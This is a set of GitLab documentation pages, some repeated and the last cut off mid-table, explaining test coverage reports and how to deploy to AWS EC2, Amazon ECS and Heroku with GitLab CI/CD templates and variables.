post](https://go.dev/blog/cover) for more details. ```yaml run tests: stage: test image: golang:1.17 script: - go install - go test ./... -coverprofile=coverage.txt -covermode count - go get github.com/boumenot/gocover-cobertura - go run github.com/boumenot/gocover-cobertura < coverage.txt > coverage.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.xml ``` ### Ruby example The following `.gitlab-ci.yml` example for Ruby uses - [`rspec`](https://rspec.info/) to run tests. - [`simplecov`](https://github.com/simplecov-ruby/simplecov) and [`simplecov-cobertura`](https://github.com/dashingrocket/simplecov-cobertura) to record the coverage profile and create a report in the Cobertura XML format. This example assumes: - That [`bundler`](https://bundler.io/) is being used for dependency management. The `rspec`, `simplecov` and `simplecov-cobertura` gems have been added to your `Gemfile`. - The `CoberturaFormatter` has been added to your `SimpleCov.formatters` configuration in the `spec_helper.rb` file. ```yaml run tests: stage: test image: ruby:3.1 script: - bundle install - bundle exec rspec artifacts: reports: coverage_report: coverage_format: cobertura path: coverage/coverage.xml ``` ## Troubleshooting ### Test coverage visualization not displayed If the test coverage visualization is not displayed in the diff view, you can check the coverage report itself and verify that: - The file you are viewing in the diff view is mentioned in the coverage report. - The `source` and `filename` nodes in the report follows the [expected structure](#automatic-class-path-correction) to match the files in your repository. - The pipeline has completed. If the pipeline is [blocked on a manual job](../../jobs/job_control.md#types-of-manual-jobs), the pipeline is not considered complete. - The coverage report file does not exceed the [limits](#limits). Report artifacts are not downloadable by default. If you want the report to be downloadable from the job details page, add your coverage report to the artifact `paths`: ```yaml artifacts: paths: - coverage/cobertura-coverage.xml reports: coverage_report: coverage_format: cobertura path: coverage/cobertura-coverage.xml ```
https://docs.gitlab.com/ci/cloud_deployment
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/cloud_deployment
[ "doc", "ci", "cloud_deployment" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Deploy to AWS from GitLab CI/CD
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides Docker images with the libraries and tools you need to deploy to AWS. You can reference these images in your CI/CD pipeline. If you're using GitLab.com and deploying to the [Amazon Elastic Container Service](https://aws.amazon.com/ecs/) (ECS), read about [deploying to ECS](ecs/deploy_to_aws_ecs.md). {{< alert type="note" >}} If you are comfortable configuring a deployment yourself and just need to retrieve AWS credentials, consider using [ID tokens and OpenID Connect](../cloud_services/aws/_index.md). ID tokens are more secure than storing credentials in CI/CD variables, but do not work with the guidance on this page. {{< /alert >}} ## Authenticate GitLab with AWS To use GitLab CI/CD to connect to AWS, you must authenticate. After you set up authentication, you can configure CI/CD to deploy. 1. Sign on to your AWS account. 1. Create [an IAM user](https://console.aws.amazon.com/iam/home#/home). 1. Select your user to access its details. Go to **Security credentials > Create a new access key**. 1. Note the **Access key ID** and **Secret access key**. 1. In your GitLab project, go to **Settings > CI/CD**. Set the following [CI/CD variables](../variables/_index.md): | Environment variable name | Value | |:--------------------------|:------| | `AWS_ACCESS_KEY_ID` | Your Access key ID. | | `AWS_SECRET_ACCESS_KEY` | Your secret access key. | | `AWS_DEFAULT_REGION` | Your region code. You might want to confirm that the AWS service you intend to use is [available in the chosen region](https://aws.amazon.com/about-aws/global-infrastructure/regional-product-services/). | 1. Variables are [protected by default](../variables/_index.md#protect-a-cicd-variable). To use GitLab CI/CD with branches or tags that are not protected, clear the **Protect variable** checkbox. ## Use an image to run AWS commands If an image contains the [AWS Command Line Interface](https://aws.amazon.com/cli/), you can reference the image in your project's `.gitlab-ci.yml` file. Then you can run `aws` commands in your CI/CD jobs. For example: ```yaml deploy: stage: deploy image: registry.gitlab.com/gitlab-org/cloud-deploy/aws-base:latest script: - aws s3 ... - aws create-deployment ... environment: production ``` GitLab provides a Docker image that includes the AWS CLI: - Images are hosted in the GitLab container registry. The latest image is `registry.gitlab.com/gitlab-org/cloud-deploy/aws-base:latest`. - [Images are stored in a GitLab repository](https://gitlab.com/gitlab-org/cloud-deploy/-/tree/master/aws). Alternately, you can use an [Amazon Elastic Container Registry (ECR)](https://aws.amazon.com/ecr/) image. [Learn how to push an image to your ECR repository](https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-push-ecr-image.html). You can also use an image from any third-party registry. ## Deploy your application to ECS You can automate deployments of your application to your [Amazon ECS](https://aws.amazon.com/ecs/) cluster. Prerequisites: - [Authenticate AWS with GitLab](#authenticate-gitlab-with-aws). - Create a cluster on Amazon ECS. - Create related components, like an ECS service or a database on Amazon RDS. - Create an ECS task definition, where the value for the `containerDefinitions[].name` attribute is the same as the `Container name` defined in your targeted ECS service. The task definition can be: - An existing task definition in ECS. - A JSON file in your GitLab project. Use the [template in the AWS documentation](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/create-task-definition.html#task-definition-template) and save the file in your project. For example `<project-root>/ci/aws/task-definition.json`. To deploy to your ECS cluster: 1. In your GitLab project, go to **Settings > CI/CD**. Set the following [CI/CD variables](../variables/_index.md). You can find these names by selecting the targeted cluster on your [Amazon ECS dashboard](https://console.aws.amazon.com/ecs/home). | Environment variable name | Value | |:----------------------------------|:------| | `CI_AWS_ECS_CLUSTER` | The name of the AWS ECS cluster that you're targeting for your deployments. | | `CI_AWS_ECS_SERVICE` | The name of the targeted service tied to your AWS ECS cluster. Ensure that this variable is scoped to the appropriate environment (`production`, `staging`, `review/*`). | | `CI_AWS_ECS_TASK_DEFINITION` | If the task definition is in ECS, the name of the task definition tied to the service. | | `CI_AWS_ECS_TASK_DEFINITION_FILE` | If the task definition is a JSON file in GitLab, the filename, including the path. For example, `ci/aws/my_task_definition.json`. If the name of the task definition in your JSON file is the same name as an existing task definition in ECS, then a new revision is created when CI/CD runs. Otherwise, a brand new task definition is created, starting at revision 1. | {{< alert type="warning" >}} If you define both `CI_AWS_ECS_TASK_DEFINITION_FILE` and `CI_AWS_ECS_TASK_DEFINITION`, `CI_AWS_ECS_TASK_DEFINITION_FILE` takes precedence. {{< /alert >}} 1. Include this template in `.gitlab-ci.yml`: ```yaml include: - template: AWS/Deploy-ECS.gitlab-ci.yml ``` The `AWS/Deploy-ECS` template ships with GitLab and is available [on GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/AWS/Deploy-ECS.gitlab-ci.yml). 1. Commit and push your updated `.gitlab-ci.yml` to your project's repository. Your application Docker image is rebuilt and pushed to the GitLab container registry. If your image is located in a private registry, make sure your task definition is [configured with a `repositoryCredentials` attribute](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/private-auth.html). The targeted task definition is updated with the location of the new Docker image, and a new revision is created in ECS as result. Finally, your AWS ECS service is updated with the new revision of the task definition, making the cluster pull the newest version of your application. {{< alert type="note" >}} ECS deploy jobs wait for the rollout to complete before exiting. To disable this behavior, set `CI_AWS_ECS_WAIT_FOR_ROLLOUT_COMPLETE_DISABLED` to a non-empty value. {{< /alert >}} {{< alert type="warning" >}} The [`AWS/Deploy-ECS.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/AWS/Deploy-ECS.gitlab-ci.yml) template includes two templates: [`Jobs/Build.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Build.gitlab-ci.yml) and [`Jobs/Deploy/ECS.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Deploy/ECS.gitlab-ci.yml). Do not include these templates on their own. Only include the `AWS/Deploy-ECS.gitlab-ci.yml` template. These other templates are designed to be used only with the main template. They may move or change unexpectedly. Also, the job names in these templates may change. Do not override these job names in your own pipeline, because the override stops working when the name changes. {{< /alert >}} ## Deploy your application to EC2 GitLab provides a template, called `AWS/CF-Provision-and-Deploy-EC2`, to assist you in deploying to Amazon EC2. When you configure related JSON objects and use the template, the pipeline: 1. **Creates the stack**: Your infrastructure is provisioned by using the [AWS CloudFormation](https://aws.amazon.com/cloudformation/) API. 1. **Pushes to an S3 bucket**: When your build runs, it creates an artifact. The artifact is pushed to an [AWS S3](https://aws.amazon.com/s3/) bucket. 1. **Deploys to EC2**: The content is deployed on an [AWS EC2](https://aws.amazon.com/ec2/) instance, as shown in this diagram: ![Shows the CF-Provision-and-Deploy-EC2 pipeline, including the steps of provisioning infrastructure, pushing artifacts to S3, and deploying to EC2.](img/cf_ec2_diagram_v13_5.png) ### Configure the template and JSON To deploy to EC2, complete the following steps. 1. Create JSON for your stack. Use the [AWS template](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-anatomy.html). 1. Create JSON to push to S3. Include the following details. ```json { "applicationName": "string", "source": "string", "s3Location": "s3://your/bucket/project_built_file...]" } ``` The `source` is the location where a `build` job built your application. The build is saved to [`artifacts:paths`](../yaml/_index.md#artifactspaths). 1. Create JSON to deploy to EC2. Use the [AWS template](https://docs.aws.amazon.com/codedeploy/latest/APIReference/API_CreateDeployment.html). 1. Make the JSON objects accessible to your pipeline: - If you want these JSON objects saved in your repository, save the objects as three separate files. In your `.gitlab-ci.yml` file, add [CI/CD variables](../variables/_index.md) that point to the file paths relative to the project root. For example, if your JSON files are in a `<project_root>/aws` folder: ```yaml variables: CI_AWS_CF_CREATE_STACK_FILE: 'aws/cf_create_stack.json' CI_AWS_S3_PUSH_FILE: 'aws/s3_push.json' CI_AWS_EC2_DEPLOYMENT_FILE: 'aws/create_deployment.json' ``` - If you do not want these JSON objects saved in your repository, add each object as a separate [file type CI/CD variable](../variables/_index.md#use-file-type-cicd-variables) in the project settings. Use the same previous variable names. 1. In your `.gitlab-ci.yml` file, create a CI/CD variable for the name of the stack. For example: ```yaml variables: CI_AWS_CF_STACK_NAME: 'YourStackName' ``` 1. In your `.gitlab-ci.yml` file, add the CI template: ```yaml include: - template: AWS/CF-Provision-and-Deploy-EC2.gitlab-ci.yml ``` 1. Run the pipeline. - Your AWS CloudFormation stack is created based on the content of your `CI_AWS_CF_CREATE_STACK_FILE` variable. If your stack already exists, this step is skipped, but the `provision` job it belongs to still runs. - Your built application is pushed to your S3 bucket then and deployed to your EC2 instance, based on the related JSON object's content. The deployment job finishes when the deployment to EC2 is done or has failed. ## Troubleshooting ### Error `'ascii' codec can't encode character '\uxxxx'` This error can occur when the response from the `aws-cli` utility used by the Cloud Deploy images contains a Unicode character. The Cloud Deploy images we provide do not have a defined locale and default to using ASCII. To resolve this error, add the following CI/CD variable: ```yaml variables: LANG: "UTF-8" ```
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Deploy to AWS from GitLab CI/CD breadcrumbs: - doc - ci - cloud_deployment --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides Docker images with the libraries and tools you need to deploy to AWS. You can reference these images in your CI/CD pipeline. If you're using GitLab.com and deploying to the [Amazon Elastic Container Service](https://aws.amazon.com/ecs/) (ECS), read about [deploying to ECS](ecs/deploy_to_aws_ecs.md). {{< alert type="note" >}} If you are comfortable configuring a deployment yourself and just need to retrieve AWS credentials, consider using [ID tokens and OpenID Connect](../cloud_services/aws/_index.md). ID tokens are more secure than storing credentials in CI/CD variables, but do not work with the guidance on this page. {{< /alert >}} ## Authenticate GitLab with AWS To use GitLab CI/CD to connect to AWS, you must authenticate. After you set up authentication, you can configure CI/CD to deploy. 1. Sign on to your AWS account. 1. Create [an IAM user](https://console.aws.amazon.com/iam/home#/home). 1. Select your user to access its details. Go to **Security credentials > Create a new access key**. 1. Note the **Access key ID** and **Secret access key**. 1. In your GitLab project, go to **Settings > CI/CD**. Set the following [CI/CD variables](../variables/_index.md): | Environment variable name | Value | |:--------------------------|:------| | `AWS_ACCESS_KEY_ID` | Your Access key ID. | | `AWS_SECRET_ACCESS_KEY` | Your secret access key. | | `AWS_DEFAULT_REGION` | Your region code. You might want to confirm that the AWS service you intend to use is [available in the chosen region](https://aws.amazon.com/about-aws/global-infrastructure/regional-product-services/). | 1. Variables are [protected by default](../variables/_index.md#protect-a-cicd-variable). To use GitLab CI/CD with branches or tags that are not protected, clear the **Protect variable** checkbox. ## Use an image to run AWS commands If an image contains the [AWS Command Line Interface](https://aws.amazon.com/cli/), you can reference the image in your project's `.gitlab-ci.yml` file. Then you can run `aws` commands in your CI/CD jobs. For example: ```yaml deploy: stage: deploy image: registry.gitlab.com/gitlab-org/cloud-deploy/aws-base:latest script: - aws s3 ... - aws create-deployment ... environment: production ``` GitLab provides a Docker image that includes the AWS CLI: - Images are hosted in the GitLab container registry. The latest image is `registry.gitlab.com/gitlab-org/cloud-deploy/aws-base:latest`. - [Images are stored in a GitLab repository](https://gitlab.com/gitlab-org/cloud-deploy/-/tree/master/aws). Alternately, you can use an [Amazon Elastic Container Registry (ECR)](https://aws.amazon.com/ecr/) image. [Learn how to push an image to your ECR repository](https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-push-ecr-image.html). You can also use an image from any third-party registry. ## Deploy your application to ECS You can automate deployments of your application to your [Amazon ECS](https://aws.amazon.com/ecs/) cluster. Prerequisites: - [Authenticate AWS with GitLab](#authenticate-gitlab-with-aws). - Create a cluster on Amazon ECS. - Create related components, like an ECS service or a database on Amazon RDS. - Create an ECS task definition, where the value for the `containerDefinitions[].name` attribute is the same as the `Container name` defined in your targeted ECS service. The task definition can be: - An existing task definition in ECS. - A JSON file in your GitLab project. Use the [template in the AWS documentation](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/create-task-definition.html#task-definition-template) and save the file in your project. For example `<project-root>/ci/aws/task-definition.json`. To deploy to your ECS cluster: 1. In your GitLab project, go to **Settings > CI/CD**. Set the following [CI/CD variables](../variables/_index.md). You can find these names by selecting the targeted cluster on your [Amazon ECS dashboard](https://console.aws.amazon.com/ecs/home). | Environment variable name | Value | |:----------------------------------|:------| | `CI_AWS_ECS_CLUSTER` | The name of the AWS ECS cluster that you're targeting for your deployments. | | `CI_AWS_ECS_SERVICE` | The name of the targeted service tied to your AWS ECS cluster. Ensure that this variable is scoped to the appropriate environment (`production`, `staging`, `review/*`). | | `CI_AWS_ECS_TASK_DEFINITION` | If the task definition is in ECS, the name of the task definition tied to the service. | | `CI_AWS_ECS_TASK_DEFINITION_FILE` | If the task definition is a JSON file in GitLab, the filename, including the path. For example, `ci/aws/my_task_definition.json`. If the name of the task definition in your JSON file is the same name as an existing task definition in ECS, then a new revision is created when CI/CD runs. Otherwise, a brand new task definition is created, starting at revision 1. | {{< alert type="warning" >}} If you define both `CI_AWS_ECS_TASK_DEFINITION_FILE` and `CI_AWS_ECS_TASK_DEFINITION`, `CI_AWS_ECS_TASK_DEFINITION_FILE` takes precedence. {{< /alert >}} 1. Include this template in `.gitlab-ci.yml`: ```yaml include: - template: AWS/Deploy-ECS.gitlab-ci.yml ``` The `AWS/Deploy-ECS` template ships with GitLab and is available [on GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/AWS/Deploy-ECS.gitlab-ci.yml). 1. Commit and push your updated `.gitlab-ci.yml` to your project's repository. Your application Docker image is rebuilt and pushed to the GitLab container registry. If your image is located in a private registry, make sure your task definition is [configured with a `repositoryCredentials` attribute](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/private-auth.html). The targeted task definition is updated with the location of the new Docker image, and a new revision is created in ECS as result. Finally, your AWS ECS service is updated with the new revision of the task definition, making the cluster pull the newest version of your application. {{< alert type="note" >}} ECS deploy jobs wait for the rollout to complete before exiting. To disable this behavior, set `CI_AWS_ECS_WAIT_FOR_ROLLOUT_COMPLETE_DISABLED` to a non-empty value. {{< /alert >}} {{< alert type="warning" >}} The [`AWS/Deploy-ECS.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/AWS/Deploy-ECS.gitlab-ci.yml) template includes two templates: [`Jobs/Build.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Build.gitlab-ci.yml) and [`Jobs/Deploy/ECS.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Deploy/ECS.gitlab-ci.yml). Do not include these templates on their own. Only include the `AWS/Deploy-ECS.gitlab-ci.yml` template. These other templates are designed to be used only with the main template. They may move or change unexpectedly. Also, the job names in these templates may change. Do not override these job names in your own pipeline, because the override stops working when the name changes. {{< /alert >}} ## Deploy your application to EC2 GitLab provides a template, called `AWS/CF-Provision-and-Deploy-EC2`, to assist you in deploying to Amazon EC2. When you configure related JSON objects and use the template, the pipeline: 1. **Creates the stack**: Your infrastructure is provisioned by using the [AWS CloudFormation](https://aws.amazon.com/cloudformation/) API. 1. **Pushes to an S3 bucket**: When your build runs, it creates an artifact. The artifact is pushed to an [AWS S3](https://aws.amazon.com/s3/) bucket. 1. **Deploys to EC2**: The content is deployed on an [AWS EC2](https://aws.amazon.com/ec2/) instance, as shown in this diagram: ![Shows the CF-Provision-and-Deploy-EC2 pipeline, including the steps of provisioning infrastructure, pushing artifacts to S3, and deploying to EC2.](img/cf_ec2_diagram_v13_5.png) ### Configure the template and JSON To deploy to EC2, complete the following steps. 1. Create JSON for your stack. Use the [AWS template](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-anatomy.html). 1. Create JSON to push to S3. Include the following details. ```json { "applicationName": "string", "source": "string", "s3Location": "s3://your/bucket/project_built_file...]" } ``` The `source` is the location where a `build` job built your application. The build is saved to [`artifacts:paths`](../yaml/_index.md#artifactspaths). 1. Create JSON to deploy to EC2. Use the [AWS template](https://docs.aws.amazon.com/codedeploy/latest/APIReference/API_CreateDeployment.html). 1. Make the JSON objects accessible to your pipeline: - If you want these JSON objects saved in your repository, save the objects as three separate files. In your `.gitlab-ci.yml` file, add [CI/CD variables](../variables/_index.md) that point to the file paths relative to the project root. For example, if your JSON files are in a `<project_root>/aws` folder: ```yaml variables: CI_AWS_CF_CREATE_STACK_FILE: 'aws/cf_create_stack.json' CI_AWS_S3_PUSH_FILE: 'aws/s3_push.json' CI_AWS_EC2_DEPLOYMENT_FILE: 'aws/create_deployment.json' ``` - If you do not want these JSON objects saved in your repository, add each object as a separate [file type CI/CD variable](../variables/_index.md#use-file-type-cicd-variables) in the project settings. Use the same previous variable names. 1. In your `.gitlab-ci.yml` file, create a CI/CD variable for the name of the stack. For example: ```yaml variables: CI_AWS_CF_STACK_NAME: 'YourStackName' ``` 1. In your `.gitlab-ci.yml` file, add the CI template: ```yaml include: - template: AWS/CF-Provision-and-Deploy-EC2.gitlab-ci.yml ``` 1. Run the pipeline. - Your AWS CloudFormation stack is created based on the content of your `CI_AWS_CF_CREATE_STACK_FILE` variable. If your stack already exists, this step is skipped, but the `provision` job it belongs to still runs. - Your built application is pushed to your S3 bucket then and deployed to your EC2 instance, based on the related JSON object's content. The deployment job finishes when the deployment to EC2 is done or has failed. ## Troubleshooting ### Error `'ascii' codec can't encode character '\uxxxx'` This error can occur when the response from the `aws-cli` utility used by the Cloud Deploy images contains a Unicode character. The Cloud Deploy images we provide do not have a defined locale and default to using ASCII. To resolve this error, add the following CI/CD variable: ```yaml variables: LANG: "UTF-8" ```
https://docs.gitlab.com/ci/heroku
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/heroku.md
2025-08-13
doc/ci/cloud_deployment
[ "doc", "ci", "cloud_deployment" ]
heroku.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use GitLab CI/CD to deploy to Heroku
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can deploy an application to Heroku by using GitLab CI/CD. ## Prerequisites - A [Heroku](https://id.heroku.com/login) account. Sign in with an existing Heroku account or create a new one. ## Deploy to Heroku 1. In Heroku: 1. Create an application and copy the application name. 1. Browse to **Account Settings** and copy the API key. 1. In your GitLab project, create two [variables](../variables/_index.md): - `HEROKU_APP_NAME` for the application name. - `HEROKU_PRODUCTION_KEY` for the API key 1. Edit your `.gitlab-ci.yml` file to add the Heroku deployment command. This example uses the `dpl` gem for Ruby: ```yaml heroku_deploy: stage: production script: - gem install dpl - dpl --provider=heroku --app=$HEROKU_APP_NAME --api-key=$HEROKU_PRODUCTION_KEY ```
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use GitLab CI/CD to deploy to Heroku breadcrumbs: - doc - ci - cloud_deployment --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can deploy an application to Heroku by using GitLab CI/CD. ## Prerequisites - A [Heroku](https://id.heroku.com/login) account. Sign in with an existing Heroku account or create a new one. ## Deploy to Heroku 1. In Heroku: 1. Create an application and copy the application name. 1. Browse to **Account Settings** and copy the API key. 1. In your GitLab project, create two [variables](../variables/_index.md): - `HEROKU_APP_NAME` for the application name. - `HEROKU_PRODUCTION_KEY` for the API key 1. Edit your `.gitlab-ci.yml` file to add the Heroku deployment command. This example uses the `dpl` gem for Ruby: ```yaml heroku_deploy: stage: production script: - gem install dpl - dpl --provider=heroku --app=$HEROKU_APP_NAME --api-key=$HEROKU_PRODUCTION_KEY ```
https://docs.gitlab.com/ci/cloud_deployment/deploy_to_aws_ecs
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/cloud_deployment/deploy_to_aws_ecs.md
2025-08-13
doc/ci/cloud_deployment/ecs
[ "doc", "ci", "cloud_deployment", "ecs" ]
deploy_to_aws_ecs.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Deploy to Amazon Elastic Container Service
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This step-by-step guide helps you deploy a project hosted on GitLab.com to the Amazon [Elastic Container Service (ECS)](https://aws.amazon.com/ecs/). In this guide, you begin by creating an ECS cluster manually using the AWS console. You create and deploy a simple application that you create from a GitLab template. These instructions work for both GitLab.com and GitLab Self-Managed instances. Ensure your own [runners are configured](../../runners/_index.md). ## Prerequisites - An [AWS account](https://repost.aws/knowledge-center/create-and-activate-aws-account). Sign in with an existing AWS account or create a new one. - In this guide, you create an infrastructure in [`us-east-2` region](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html). You can use any region, but do not change it after you begin. ## Create an infrastructure and initial deployment on AWS For deploying an application from GitLab, you must first create an infrastructure and initial deployment on AWS. This includes an [ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html) and related components, such as [ECS task definitions](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html), [ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html), and containerized application image. For the first step here, you create a demo application from a project template. ### Create a new project from a template Use a GitLab project template to get started. As the name suggests, these projects provide a bare-bones application built on some well-known frameworks. 1. In GitLab on the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Create from template**, where you can choose from a Ruby on Rails, Spring, or NodeJS Express project. For this guide, use the Ruby on Rails template. 1. Give your project a name. In this example, it's named `ecs-demo`. Make it public so that you can take advantage of the features available in the [GitLab Ultimate plan](https://about.gitlab.com/pricing/). 1. Select **Create project**. Now that you created a demo project, you must containerize the application and push it to the container registry. ### Push a containerized application image to GitLab container registry [ECS](https://aws.amazon.com/ecs/) is a container orchestration service, meaning that you must provide a containerized application image during the infrastructure build. To do so, you can use GitLab [Auto Build](../../../topics/autodevops/stages.md#auto-build) and [Container Registry](../../../user/packages/container_registry/_index.md). 1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project. 1. Select **Set up CI/CD**. It brings you to a `.gitlab-ci.yml` creation form. 1. Copy and paste the following content into the empty `.gitlab-ci.yml`. This defines a pipeline for continuous deployment to ECS. ```yaml include: - template: AWS/Deploy-ECS.gitlab-ci.yml ``` 1. Select **Commit Changes**. It automatically triggers a new pipeline. In this pipeline, the `build` job containerizes the application and pushes the image to [GitLab container registry](../../../user/packages/container_registry/_index.md). 1. Visit **Deploy > Container Registry**. Make sure the application image has been pushed. ![A containerized application image in the GitLab container registry.](img/registry_v13_10.png) Now you have a containerized application image that can be pulled from AWS. Next, you define the spec of how this application image is used in AWS. The `production_ecs` job fails because ECS Cluster is not connected yet. You can fix this later. ### Create an ECS task definition [ECS Task definitions](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html) is a specification about how the application image is started by an [ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html). 1. Go to **ECS > Task Definitions** on [AWS console](https://aws.amazon.com/). 1. Select **Create new Task Definition**. ![Task definitions page with a 'Create new task definition' button.](img/ecs-task-definitions_v13_10.png) 1. Choose **EC2** as the launch type. Select **Next Step**. 1. Set `ecs_demo` to **Task Definition Name**. 1. Set `512` to **Task Size > Task memory** and **Task CPU**. 1. Select **Container Definitions > Add container**. This opens a container registration form. 1. Set `web` to **Container name**. 1. Set `registry.gitlab.com/<your-namespace>/ecs-demo/master:latest` to **Image**. Alternatively, you can copy and paste the image path from the [GitLab container registry page](#push-a-containerized-application-image-to-gitlab-container-registry). ![Container name and image fields completed.](img/container-name_v13_10.png) 1. Add a port mapping. Set `80` to **Host Port** and `5000` to **Container port**. ![Port mappings fields completed.](img/container-port-mapping_v13_10.png) 1. Select **Create**. Now you have the initial task definition. Next, you create an actual infrastructure to run the application image. ### Create an ECS cluster An [ECS cluster](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/clusters.html) is a virtual group of [ECS services](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html). It's also associated with EC2 or Fargate as the computation resource. 1. Go to **ECS > Clusters** on [AWS console](https://aws.amazon.com/). 1. Select **Create Cluster**. 1. Select **EC2 Linux + Networking** as the cluster template. Select **Next Step**. 1. Set `ecs-demo` to **Cluster Name**. 1. Choose the default [VPC](https://aws.amazon.com/vpc/?vpc-blogs.sort-by=item.additionalFields.createdDate&vpc-blogs.sort-order=desc) in **Networking**. If there are no existing VPCs, you can leave it as-is to create a new one. 1. Set all available subnets of the VPC to **Subnets**. 1. Select **Create**. 1. Make sure that the ECS cluster has been successfully created. ![ECS cluster created successfully with all instances running.](img/ecs-launch-status_v13_10.png) Now you can register an ECS service to the ECS cluster in the next step. Note the following: - Optionally, you can set a SSH key pair in the creation form. This allows you to SSH to the EC2 instance for debugging. - If you don't choose an existing VPC, it creates a new VPC by default. This could cause an error if it reaches the maximum allowed number of internet gateways on your account. - The cluster requires an EC2 instance, meaning it costs you [according to the instance-type](https://aws.amazon.com/ec2/pricing/on-demand/). ### Create an ECS Service [ECS service](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html) is a daemon to create an application container based on the [ECS task definition](#create-an-ecs-task-definition). 1. Go to **ECS > Clusters > ecs-demo > Services** on the [AWS console](https://aws.amazon.com/) 1. Select **Deploy**. This opens a service creation form. 1. Select `EC2` in **Launch Type**. 1. Set `ecs_demo` to **Task definition**. This corresponds to [the task definition you created previously](#create-an-ecs-task-definition). 1. Set `ecs_demo` to **Service name**. 1. Set `1` to **Desired tasks**. ![Services page with all inputs completed.](img/service-parameter_v13_10.png) 1. Select **Deploy**. 1. Make sure that the created service is active. ![An active service running with tasks.](img/service-running_v13_10.png) The AWS console UI changes from time to time. If you can't find a relevant component in the instructions, select the closest one. ### View the demo application Now, the demo application is accessible from the internet. 1. Go to **EC2 > Instances** on the [AWS console](https://aws.amazon.com/) 1. Search by `ECS Instance` to find the corresponding EC2 instance that [the ECS cluster created](#create-an-ecs-cluster). 1. Select the ID of the EC2 instance. This brings you to the instance detail page. 1. Copy **Public IPv4 address** and paste it in the browser. Now you can see the demo application running. ![The demo application running in a browser.](img/view-running-app_v13_10.png) In this guide, HTTPS/SSL is **not** configured. You can access to the application through HTTP only (for example, `http://<ec2-ipv4-address>`). ## Set up Continuous Deployment from GitLab Now that you have an application running on ECS, you can set up continuous deployment from GitLab. ### Create a new IAM user as a deployer For GitLab to access the ECS cluster, service, and task definition that you previously created, you must create a deployer user on AWS: 1. Go to **IAM > Users** on [AWS console](https://aws.amazon.com/). 1. Select **Add user**. 1. Set `ecs_demo` to **User name**. 1. Enable **Programmatic access** checkbox. Select **Next: Permissions**. 1. Select `Attach existing policies directly` in **Set permissions**. 1. Select `AmazonECS_FullAccess` from the policy list. Select **Next: Tags** and **Next: Review**. ![A selected `AmazonECS_FullAccess` policy.](img/ecs-policy_v13_10.png) 1. Select **Create user**. 1. Take note of the **Access key ID** and **Secret access key** of the created user. {{< alert type="note" >}} Do not share the secret access key in a public place. You must save it in a secure place. {{< /alert >}} ### Setup credentials in GitLab to let pipeline jobs access to ECS You can register the access information in [GitLab CI/CD Variables](../../variables/_index.md). These variables are injected into the pipeline jobs and can access the ECS API. 1. On the left sidebar, select **Search or go to** and find your `ecs-demo` project. 1. Go to **Settings > CI/CD > Variables**. 1. Select **Add Variable** and set the following key-value pairs. | Key | Value | Note | |------------------------------|---------------------------------------|------| | `AWS_ACCESS_KEY_ID` | `<Access key ID of the deployer>` | For authenticating `aws` CLI. | | `AWS_SECRET_ACCESS_KEY` | `<Secret access key of the deployer>` | For authenticating 